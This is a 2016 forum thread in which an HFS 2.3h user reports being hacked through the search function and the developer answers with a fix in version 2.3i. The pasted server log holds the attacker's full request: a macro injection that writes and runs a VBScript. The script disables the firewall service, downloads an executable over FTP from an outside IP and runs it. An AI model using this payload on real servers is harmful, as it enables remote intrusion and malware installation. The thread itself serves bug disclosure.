rejetto forum

Software => HFS ~ HTTP File Server => Bug reports => Topic started by: apanx on June 14, 2016, 09:18:05 PM

Title: Execution Exploit in search function
Post by: apanx on June 14, 2016, 09:18:05 PM
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

Code: [Select]
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/
Title: Re: Execution Exploit in search function
Post by: Mars on June 14, 2016, 09:59:59 PM
Thank for report, rejetto is beginning to address the issue
Title: Re: Execution Exploit in search function
Post by: rejetto on June 14, 2016, 10:13:37 PM
i'm sorry for the problem.
I'm working on it.
Title: Re: Execution Exploit in search function
Post by: rejetto on June 14, 2016, 10:58:23 PM
please update to 2.3i
Title: Re: Execution Exploit in search function
Post by: Fysack on September 30, 2017, 11:19:40 PM
 ;D ;D ;D